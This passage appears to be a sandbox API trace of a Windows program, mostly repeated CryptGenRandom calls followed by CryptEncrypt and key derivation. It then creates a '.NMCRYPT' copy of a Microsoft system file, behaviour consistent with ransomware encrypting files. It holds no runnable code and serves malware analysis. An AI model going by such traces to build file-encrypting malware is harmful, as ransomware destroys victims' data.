dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.699] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.700] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.701] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.702] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.704] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.704] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.705] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0160.705] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.705] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad5f8) returned 1 [0160.705] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.705] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.705] wcslen (_String="\\\\?\\") returned 0x4 [0160.705] CryptDuplicateKey (in: hKey=0x9ad5f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5b8) returned 1 [0160.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.706] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0160.706] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, 